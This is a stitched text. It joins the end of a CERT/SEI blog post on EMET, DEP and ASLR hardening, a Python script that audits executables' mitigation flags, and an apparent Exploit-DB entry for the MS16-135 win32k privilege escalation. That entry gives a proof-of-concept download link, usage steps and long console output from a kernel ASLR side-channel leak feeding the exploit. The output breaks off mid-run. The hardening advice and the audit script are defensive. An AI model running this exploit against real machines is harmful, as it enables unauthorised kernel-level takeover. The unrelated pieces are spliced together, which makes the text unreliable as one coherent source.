Microsoft indicates, "Before setting BCDEdit options you might need to disable or suspend BitLocker and Secure Boot on the computer."

To change the DEP setting to AlwaysOn, in a CMD prompt with administrative privileges run:

    bcdedit.exe /set {current} nx AlwaysOn

ASLR

System-wide ASLR can be configured by importing the following registry value:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
    "MoveImages"=dword:ffffffff

Notes for System-Wide Settings

EMET is not required for setting the above system-wide mitigations for DEP and ASLR. Enabling these features will make Windows more secure than the default configuration. However, the system-wide mitigations are less granular than what is available with EMET. In particular, if an application that you need to run is incompatible with a particular mitigation, it may not be possible to allow that application to run when the system-wide mitigations are in place. On a system with EMET, however, the system-wide mitigations can be relaxed, and compatible application-specific mitigations can be applied on a program-by-program basis.

Conclusions and Recommendations

While EMET itself is a free tool, successful deployment of it takes some work. But there are rewards to be reaped from this work.

- From an exploit mitigation perspective, upgrading to Windows 10 is a good idea.
- Installing EMET with application-specific mitigations configured is also a good idea.
- EMET provides some protection against zero-day vulnerabilities in supported software, as well as forever-day vulnerabilities in unsupported software.
- If the use of EMET is not possible, then the system-wide mitigations of DEP and ASLR can be applied without EMET.
- Windows 10 does not provide all of the mitigation features that EMET administrators have come to rely on.
About the Author

Will Dormann

Source: https://insights.sei.cmu.edu/cert/2016/11/windows-10-cannot-protect-insecure-applications-like-emet-can.html
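The question the post raises ("do you know which ones are built with CFG support?") can be answered from the PE headers of the binaries themselves. The following is an added example, not code from the original post or from CERT/SEI: a Python audit script that reads the DllCharacteristics word of the optional header (/DYNAMICBASE, /HIGHENTROPYVA, /NXCOMPAT, /guard:cf) and the Characteristics word of the COFF header, and flags a /DYNAMICBASE image whose relocations were stripped, since such an image cannot actually be rebased. The flag values are the documented PE/COFF constants; build_sample_pe is a constructed, minimal header used only to exercise the parser and is not a loadable image.

```python
import struct

# IMAGE_OPTIONAL_HEADER.DllCharacteristics flags (PE/COFF specification values)
IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020  # 64-bit ASLR opt-in (/HIGHENTROPYVA)
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040     # ASLR opt-in (/DYNAMICBASE)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100        # DEP opt-in (/NXCOMPAT)
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400           # image declares no SEH handlers
IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000         # Control Flow Guard (/guard:cf)
# IMAGE_FILE_HEADER.Characteristics flag
IMAGE_FILE_RELOCS_STRIPPED = 0x0001                # no relocations: loader cannot rebase


def pe_mitigations(data: bytes) -> dict:
    """Parse the DOS, COFF and optional headers of an in-memory PE image and
    report which exploit-mitigation opt-ins the linker recorded in it."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, coff_chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if opt_size < 72 or len(data) < opt + 72:
        raise ValueError("optional header too short")
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics is at offset 70 of the optional header in both PE32 and PE32+
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)

    dynamic_base = bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    relocs_stripped = bool(coff_chars & IMAGE_FILE_RELOCS_STRIPPED)
    pe32plus = magic == 0x20B
    return {
        "pe32plus": pe32plus,
        "machine": machine,
        "dynamic_base": dynamic_base,
        "relocs_stripped": relocs_stripped,
        # /DYNAMICBASE only helps when the loader can actually relocate the image
        "aslr_effective": dynamic_base and not relocs_stripped,
        "high_entropy_va": pe32plus and bool(dll_chars & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        "nx_compat": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NO_SEH),
        "cfg": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_GUARD_CF),
    }


def missing_mitigations(data: bytes) -> list:
    """Names of the opt-ins a hardened build is expected to carry but this image lacks."""
    m = pe_mitigations(data)
    missing = []
    if not m["aslr_effective"]:
        missing.append("ASLR")
    if m["pe32plus"] and not m["high_entropy_va"]:
        missing.append("HighEntropyVA")
    if not m["nx_compat"]:
        missing.append("DEP")
    if not m["cfg"]:
        missing.append("CFG")
    return missing


def audit_file(path: str) -> list:
    """Audit one executable or DLL on disk."""
    with open(path, "rb") as f:
        return missing_mitigations(f.read())


def build_sample_pe(dll_chars: int, coff_chars: int = 0, pe32plus: bool = True) -> bytes:
    """Constructed minimal PE header (no sections, not loadable) for testing the parser."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 240 if pe32plus else 224
    machine = 0x8664 if pe32plus else 0x14C
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, coff_chars)
    opt = struct.pack("<H", 0x20B if pe32plus else 0x10B) + b"\0" * 68 + struct.pack("<H", dll_chars)
    opt += b"\0" * (opt_size - len(opt))
    return dos + b"PE\0\0" + coff + opt


if __name__ == "__main__":
    hardened = build_sample_pe(0x0020 | 0x0040 | 0x0100 | 0x4000)
    legacy = build_sample_pe(0)
    print("hardened sample missing:", missing_mitigations(hardened))
    print("legacy sample missing:", missing_mitigations(legacy))
```

Run audit_file over the executables and DLLs of an application directory to get, per image, the list of mitigations the build does not opt in to; images reported as missing "ASLR" or "CFG" are the ones the post is talking about, where OS support alone does not protect the process.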
-
Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)

Complete Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip

Presentation: https://www.exploit-db.com/docs/40822.pdf
I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016

Requirements
- Intel Processor (Haswell or newer)
- Windows 10 x64

Usage

Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:

C:\Users\qa\Desktop>ASLRSideChannelAttack.exe
+] Setting thread affinity to CPU 0
+] Getting all the potential PML4 SelfRef
+] Mapping a page oracle
+] Allocating probing target pages...
Allocation 0: 0000020E339D0000
Allocation 1: 0000020E339E0000
Allocation 2: 0000020E339F0000
Allocation 3: 0000020E33A00000
Allocation 4: 0000020E33A10000
--------------------------
+] Check that Unammped and Mapped values are consistent across several executions!
--------------------------
Unmapped Initial: 256.683746
Mapped Initial: 203.692978
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.440018
Mapped: 202.827560
--------------------------
Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213
+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563
+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382
+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256
+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175
+] PTE FFFF810804020100 looks mapped! - Time: 204.740097
+] Removing 102 from initial array and pushing it into final array
Potential SelfRef: FFFF81C0E0703818
+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774
+] PTE FFFF81810719CF80 looks mapped!
- Time: 208.949921 +] PTE FFFF81810719D000 looks mapped! - Time: 202.525726 +] PTE FFFF81810719D080 looks mapped! - Time: 208.673874 Time difference exceed for ffff818804020100, retrying... +] PTE FFFF818804020100 looks mapped! - Time: 209.071213 +] Removing 103 from initial array and pushing it into final array Time difference exceed for ffff824120904820, retrying... Potential SelfRef: FFFF824120904820 +] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642 Time difference exceed for ffff82010719cf00, retrying... +] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593 +] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344 +] PTE FFFF82010719D000 looks mapped! - Time: 207.820862 +] PTE FFFF82010719D080 looks mapped! - Time: 197.229263 +] PTE FFFF820804020100 looks mapped! - Time: 204.585739 +] Removing 104 from initial array and pushing it into final array Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003 Time difference exceed for ffff8341a0d06830, retrying... Potential SelfRef: FFFF8341A0D06830 +] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657 +] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697 +] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016 +] PTE FFFF83010719D000 looks mapped! - Time: 214.013504 +] PTE FFFF83010719D080 looks mapped! - Time: 191.688126 +] PTE FFFF830804020100 looks mapped! - Time: 193.314758 +] Removing 106 from initial array and pushing it into final array Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973 +] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693 +] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097 +] PTE FFFF83810719D000 looks mapped! - Time: 216.298660 +] PTE FFFF83810719D080 looks mapped! - Time: 203.848816 +] PTE FFFF838804020100 looks mapped! - Time: 204.008743 +] Removing 107 from initial array and pushing it into final array Time difference exceed for ffff89c4e2713898, retrying... 
Time difference exceed for ffff8bc5e2f178b8, retrying... Time difference exceed for ffff8c46231188c0, retrying... Unmapped Initial: 248.508636 Mapped Initial: 207.139847 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 236.360733 Mapped: 195.650040 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363 Potential SelfRef: FFFF81C0E0703818 Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... +] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393 Time difference exceed for ffff81810719cf00, retrying... +] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645 +] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724 +] PTE FFFF81810719D000 looks mapped! - Time: 197.655167 +] PTE FFFF81810719D080 looks mapped! - Time: 201.667160 +] PTE FFFF818804020100 looks mapped! - Time: 195.728439 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF81C0E0703818 - Index: 103 PML4e: FFFF824120904820 - Index: 104 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff818000000000 -] Erasing 103 from final array Potential SelfRef: FFFF824120904820 +] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759 +] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019 +] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364 +] PTE FFFF82010719D000 looks mapped! - Time: 203.052826 +] PTE FFFF82010719D080 looks mapped! - Time: 194.115143 +] PTE FFFF820804020100 looks mapped! 
- Time: 198.158585 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF824120904820 - Index: 104 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff820000000000 -] Erasing 104 from final array Potential SelfRef: FFFF8341A0D06830 +] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823 +] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525 +] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040 +] PTE FFFF83010719D000 looks mapped! - Time: 196.066254 +] PTE FFFF83010719D080 looks mapped! - Time: 189.007034 +] PTE FFFF830804020100 looks mapped! - Time: 197.613953 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff830000000000 -] Erasing 106 from final array Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380 Time difference exceed for ffff83810719cf00, retrying... Time difference exceed for ffff83810719cf00, retrying... Unmapped Initial: 232.123840 Mapped Initial: 196.420654 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 234.845581 Mapped: 187.862518 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938 +] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766 Time difference exceed for ffff81010719cf80, retrying... Time difference exceed for ffff81010719cf80, retrying... Time difference exceed for ffff81010719cf80, retrying... +] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784 +] PTE FFFF81010719D000 looks mapped! - Time: 194.332733 +] PTE FFFF81010719D080 looks mapped! - Time: 200.211182 +] PTE FFFF810804020100 looks mapped! 
- Time: 199.812225 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff810000000000 Time difference exceed for ffff810000000000, retrying... -] Erasing 102 from final array Time difference exceed for ffff83c1e0f07838, retrying... Potential SelfRef: FFFF83C1E0F07838 Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Unmapped Initial: 230.247162 Mapped Initial: 198.023987 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 235.923035 Mapped: 191.605301 -------------------------- Time difference exceed for ffff83c1e0f07838, retrying... Time difference exceed for ffff83c1e0f07838, retrying... Potential SelfRef: FFFF83C1E0F07838 Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Unmapped Initial: 258.041046 Mapped Initial: 210.309753 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 238.757538 Mapped: 203.896240 -------------------------- Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102 +] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836 +] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333 +] PTE FFFF83810719D000 looks mapped! - Time: 197.218445 +] PTE FFFF83810719D080 looks mapped! - Time: 203.334763 +] PTE FFFF838804020100 looks mapped! 
- Time: 203.243607 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff838000000000 -] Erasing 107 from final array Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221 +] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138 +] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006 +] PTE FFFF82810719D000 looks mapped! - Time: 209.909943 +] PTE FFFF82810719D080 looks mapped! - Time: 202.795639 +] PTE FFFF828804020100 looks mapped! - Time: 196.754044 +] Removing 105 from initial array and pushing it into final array Time difference exceed for ffff884422110880, retrying... Time difference exceed for ffff884422110880, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff90c864321908, retrying... Unmapped Initial: 257.754272 Mapped Initial: 207.903702 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 247.145935 Mapped: 207.792923 -------------------------- Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092 +] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715 +] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614 +] PTE FFFF82810719D000 looks mapped! - Time: 213.698837 +] PTE FFFF82810719D080 looks mapped! - Time: 210.162796 +] PTE FFFF828804020100 looks mapped! 
- Time: 208.765045 PML4e: FFFF82C160B05828 - Index: 105 KNOWN_UNMAPPED PTE: ffff828000000000 -] Erasing 105 from final array -] Removing 100 as it seems to be unmapped -] Removing 101 as it seems to be unmapped -] Removing 108 as it seems to be unmapped -] Removing 109 as it seems to be unmapped -] Removing 10a as it seems to be unmapped -] Removing 10b as it seems to be unmapped -] Removing 10c as it seems to be unmapped -] Removing 10d as it seems to be unmapped Time difference exceed for ffff8743a1d0e870, retrying... -] Removing 10e as it seems to be unmapped -] Removing 10f as it seems to be unmapped -] Removing 110 as it seems to be unmapped Time difference exceed for ffff88c462311888, retrying... -] Removing 111 as it seems to be unmapped -] Removing 112 as it seems to be unmapped -] Removing 113 as it seems to be unmapped Time difference exceed for ffff8a45229148a0, retrying... -] Removing 114 as it seems to be unmapped -] Removing 115 as it seems to be unmapped -] Removing 116 as it seems to be unmapped -] Removing 117 as it seems to be unmapped Time difference exceed for ffffbc5e2f178bc0, retrying... Time difference exceed for ffffbc5e2f178bc0, retrying... Time difference exceed for ffffe8f47a3d1e88, retrying... Potential SelfRef: FFFFF67B3D9ECF60 +] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379 +] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694 +] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502 +] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920 +] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059 +] PTE FFFFF60804020100 looks mapped! - Time: 211.636246 +] Removing 1ec from initial array and pushing it into final array Unmapped Initial: 233.678802 Mapped Initial: 214.496124 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... 
--------------------------
Unmapped: 250.585373
Mapped: 213.339661
--------------------------
Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174
+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457
+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861
+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334
+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160
+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926
PML4e: FFFFF67B3D9ECF60 - Index: 1ec
KNOWN_UNMAPPED PTE: fffff60000000000
Real PML4 SelfRef Found: fffff67b3d9ecf60
Left in Potential Array: ffff8c46231188c0
Left in Potential Array: ffff8cc6633198c8
Left in Potential Array: ffff8d46a351a8d0
Left in Potential Array: ffff8dc6e371b8d8
Left in Potential Array: ffff8e472391c8e0
Left in Potential Array: ffff8ec763b1d8e8
Left in Potential Array: ffff8f47a3d1e8f0
Left in Potential Array: ffff8fc7e3f1f8f8
Left in Potential Array: ffff904824120900
Left in Potential Array: ffff90c864321908
Left in Potential Array: ffff9148a4522910
Left in Potential Array: ffff91c8e4723918
Left in Potential Array: ffff924924924920
Left in Potential Array: ffff92c964b25928
Left in Potential Array: ffff9349a4d26930
Left in Potential Array: ffff93c9e4f27938
Left in Potential Array: ffff944a25128940
Left in Potential Array: ffff94ca65329948
Left in Potential Array: ffff954aa552a950
Left in Potential Array: ffff95cae572b958
Left in Potential Array: ffff964b2592c960
Left in Potential Array: ffff96cb65b2d968
Left in Potential Array: ffff974ba5d2e970
Left in Potential Array: ffff97cbe5f2f978
Left in Potential Array: ffff984c26130980
Left in Potential Array: ffff98cc66331988
Left in Potential Array: ffff994ca6532990
Left in Potential Array: ffff99cce6733998
Left in Potential Array: ffff9a4d269349a0
Left in Potential Array: ffff9acd66b359a8
Left in Potential Array: ffff9b4da6d369b0
Left in Potential Array: ffff9bcde6f379b8
Left in Potential Array: ffff9c4e271389c0
Left in Potential Array:
ffff9cce673399c8 Left in Potential Array: ffff9d4ea753a9d0 Left in Potential Array: ffff9dcee773b9d8 Left in Potential Array: ffff9e4f2793c9e0 Left in Potential Array: ffff9ecf67b3d9e8 Left in Potential Array: ffff9f4fa7d3e9f0 Left in Potential Array: ffff9fcfe7f3f9f8 Left in Potential Array: ffffa05028140a00 Left in Potential Array: ffffa0d068341a08 Left in Potential Array: ffffa150a8542a10 Left in Potential Array: ffffa1d0e8743a18 Left in Potential Array: ffffa25128944a20 Left in Potential Array: ffffa2d168b45a28 Left in Potential Array: ffffa351a8d46a30 Left in Potential Array: ffffa3d1e8f47a38 Left in Potential Array: ffffa45229148a40 Left in Potential Array: ffffa4d269349a48 Left in Potential Array: ffffa552a954aa50 Left in Potential Array: ffffa5d2e974ba58 Left in Potential Array: ffffa6532994ca60 Left in Potential Array: ffffa6d369b4da68 Left in Potential Array: ffffa753a9d4ea70 Left in Potential Array: ffffa7d3e9f4fa78 Left in Potential Array: ffffa8542a150a80 Left in Potential Array: ffffa8d46a351a88 Left in Potential Array: ffffa954aa552a90 Left in Potential Array: ffffa9d4ea753a98 Left in Potential Array: ffffaa552a954aa0 Left in Potential Array: ffffaad56ab55aa8 Left in Potential Array: ffffab55aad56ab0 Left in Potential Array: ffffabd5eaf57ab8 Left in Potential Array: ffffac562b158ac0 Left in Potential Array: ffffacd66b359ac8 Left in Potential Array: ffffad56ab55aad0 Left in Potential Array: ffffadd6eb75bad8 Left in Potential Array: ffffae572b95cae0 Left in Potential Array: ffffaed76bb5dae8 Left in Potential Array: ffffaf57abd5eaf0 Left in Potential Array: ffffafd7ebf5faf8 Left in Potential Array: ffffb0582c160b00 Left in Potential Array: ffffb0d86c361b08 Left in Potential Array: ffffb158ac562b10 Left in Potential Array: ffffb1d8ec763b18 Left in Potential Array: ffffb2592c964b20 Left in Potential Array: ffffb2d96cb65b28 Left in Potential Array: ffffb359acd66b30 Left in Potential Array: ffffb3d9ecf67b38 Left in Potential Array: ffffb45a2d168b40 Left in 
Potential Array: ffffb4da6d369b48 Left in Potential Array: ffffb55aad56ab50 Left in Potential Array: ffffb5daed76bb58 Left in Potential Array: ffffb65b2d96cb60 Left in Potential Array: ffffb6db6db6db68 Left in Potential Array: ffffb75badd6eb70 Left in Potential Array: ffffb7dbedf6fb78 Left in Potential Array: ffffb85c2e170b80 Left in Potential Array: ffffb8dc6e371b88 Left in Potential Array: ffffb95cae572b90 Left in Potential Array: ffffb9dcee773b98 Left in Potential Array: ffffba5d2e974ba0 Left in Potential Array: ffffbadd6eb75ba8 Left in Potential Array: ffffbb5daed76bb0 Left in Potential Array: ffffbbddeef77bb8 Left in Potential Array: ffffbc5e2f178bc0 Left in Potential Array: ffffbcde6f379bc8 Left in Potential Array: ffffbd5eaf57abd0 Left in Potential Array: ffffbddeef77bbd8 Left in Potential Array: ffffbe5f2f97cbe0 Left in Potential Array: ffffbedf6fb7dbe8 Left in Potential Array: ffffbf5fafd7ebf0 Left in Potential Array: ffffbfdfeff7fbf8 Left in Potential Array: ffffc06030180c00 Left in Potential Array: ffffc0e070381c08 Left in Potential Array: ffffc160b0582c10 Left in Potential Array: ffffc1e0f0783c18 Left in Potential Array: ffffc26130984c20 Left in Potential Array: ffffc2e170b85c28 Left in Potential Array: ffffc361b0d86c30 Left in Potential Array: ffffc3e1f0f87c38 Left in Potential Array: ffffc46231188c40 Left in Potential Array: ffffc4e271389c48 Left in Potential Array: ffffc562b158ac50 Left in Potential Array: ffffc5e2f178bc58 Left in Potential Array: ffffc6633198cc60 Left in Potential Array: ffffc6e371b8dc68 Left in Potential Array: ffffc763b1d8ec70 Left in Potential Array: ffffc7e3f1f8fc78 Left in Potential Array: ffffc86432190c80 Left in Potential Array: ffffc8e472391c88 Left in Potential Array: ffffc964b2592c90 Left in Potential Array: ffffc9e4f2793c98 Left in Potential Array: ffffca6532994ca0 Left in Potential Array: ffffcae572b95ca8 Left in Potential Array: ffffcb65b2d96cb0 Left in Potential Array: ffffcbe5f2f97cb8 Left in Potential Array: 
ffffcc6633198cc0 Left in Potential Array: ffffcce673399cc8 Left in Potential Array: ffffcd66b359acd0 Left in Potential Array: ffffcde6f379bcd8 Left in Potential Array: ffffce673399cce0 Left in Potential Array: ffffcee773b9dce8 Left in Potential Array: ffffcf67b3d9ecf0 Left in Potential Array: ffffcfe7f3f9fcf8 Left in Potential Array: ffffd068341a0d00 Left in Potential Array: ffffd0e8743a1d08 Left in Potential Array: ffffd168b45a2d10 Left in Potential Array: ffffd1e8f47a3d18 Left in Potential Array: ffffd269349a4d20 Left in Potential Array: ffffd2e974ba5d28 Left in Potential Array: ffffd369b4da6d30 Left in Potential Array: ffffd3e9f4fa7d38 Left in Potential Array: ffffd46a351a8d40 Left in Potential Array: ffffd4ea753a9d48 Left in Potential Array: ffffd56ab55aad50 Left in Potential Array: ffffd5eaf57abd58 Left in Potential Array: ffffd66b359acd60 Left in Potential Array: ffffd6eb75badd68 Left in Potential Array: ffffd76bb5daed70 Left in Potential Array: ffffd7ebf5fafd78 Left in Potential Array: ffffd86c361b0d80 Left in Potential Array: ffffd8ec763b1d88 Left in Potential Array: ffffd96cb65b2d90 Left in Potential Array: ffffd9ecf67b3d98 Left in Potential Array: ffffda6d369b4da0 Left in Potential Array: ffffdaed76bb5da8 Left in Potential Array: ffffdb6db6db6db0 Left in Potential Array: ffffdbedf6fb7db8 Left in Potential Array: ffffdc6e371b8dc0 Left in Potential Array: ffffdcee773b9dc8 Left in Potential Array: ffffdd6eb75badd0 Left in Potential Array: ffffddeef77bbdd8 Left in Potential Array: ffffde6f379bcde0 Left in Potential Array: ffffdeef77bbdde8 Left in Potential Array: ffffdf6fb7dbedf0 Left in Potential Array: ffffdfeff7fbfdf8 Left in Potential Array: ffffe070381c0e00 Left in Potential Array: ffffe0f0783c1e08 Left in Potential Array: ffffe170b85c2e10 Left in Potential Array: ffffe1f0f87c3e18 Left in Potential Array: ffffe271389c4e20 Left in Potential Array: ffffe2f178bc5e28 Left in Potential Array: ffffe371b8dc6e30 Left in Potential Array: ffffe3f1f8fc7e38 Left in 
Potential Array: ffffe472391c8e40 Left in Potential Array: ffffe4f2793c9e48 Left in Potential Array: ffffe572b95cae50 Left in Potential Array: ffffe5f2f97cbe58 Left in Potential Array: ffffe673399cce60 Left in Potential Array: ffffe6f379bcde68 Left in Potential Array: ffffe773b9dcee70 Left in Potential Array: ffffe7f3f9fcfe78 Left in Potential Array: ffffe8743a1d0e80 Left in Potential Array: ffffe8f47a3d1e88 Left in Potential Array: ffffe974ba5d2e90 Left in Potential Array: ffffe9f4fa7d3e98 Left in Potential Array: ffffea753a9d4ea0 Left in Potential Array: ffffeaf57abd5ea8 Left in Potential Array: ffffeb75badd6eb0 Left in Potential Array: ffffebf5fafd7eb8 Left in Potential Array: ffffec763b1d8ec0 Left in Potential Array: ffffecf67b3d9ec8 Left in Potential Array: ffffed76bb5daed0 Left in Potential Array: ffffedf6fb7dbed8 Left in Potential Array: ffffee773b9dcee0 Left in Potential Array: ffffeef77bbddee8 Left in Potential Array: ffffef77bbddeef0 Left in Potential Array: ffffeff7fbfdfef8 Left in Potential Array: fffff0783c1e0f00 Left in Potential Array: fffff0f87c3e1f08 Left in Potential Array: fffff178bc5e2f10 Left in Potential Array: fffff1f8fc7e3f18 Left in Potential Array: fffff2793c9e4f20 Left in Potential Array: fffff2f97cbe5f28 Left in Potential Array: fffff379bcde6f30 Left in Potential Array: fffff3f9fcfe7f38 Left in Potential Array: fffff47a3d1e8f40 Left in Potential Array: fffff4fa7d3e9f48 Left in Potential Array: fffff57abd5eaf50 Left in Potential Array: fffff5fafd7ebf58 Left in Potential Array: fffff6fb7dbedf68 Left in Potential Array: fffff77bbddeef70 Left in Potential Array: fffff7fbfdfeff78 Left in Potential Array: fffff87c3e1f0f80 Left in Potential Array: fffff8fc7e3f1f88 Left in Potential Array: fffff97cbe5f2f90 Left in Potential Array: fffff9fcfe7f3f98 Left in Potential Array: fffffa7d3e9f4fa0 Left in Potential Array: fffffafd7ebf5fa8 Left in Potential Array: fffffb7dbedf6fb0 Left in Potential Array: fffffbfdfeff7fb8 Left in Potential Array: 
fffffc7e3f1f8fc0
Left in Potential Array: fffffcfe7f3f9fc8
Left in Potential Array: fffffd7ebf5fafd0
Left in Potential Array: fffffdfeff7fbfd8
Left in Potential Array: fffffe7f3f9fcfe0
Left in Potential Array: fffffeff7fbfdfe8
Left in Potential Array: ffffff7fbfdfeff0
Left in Potential Array: fffffffffffffff8
Left in Final Array: fffff67b3d9ecf60
Result: fffff67b3d9ecf60

Run SetWindowLongPtr_Exploit.exe

C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60
My PID is: 6056
Current Username: qa
PML4 Self Ref: FFFFF67B3D9ECF60
Enter to continue...
Value Self Ref = 8000000100211867
000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....
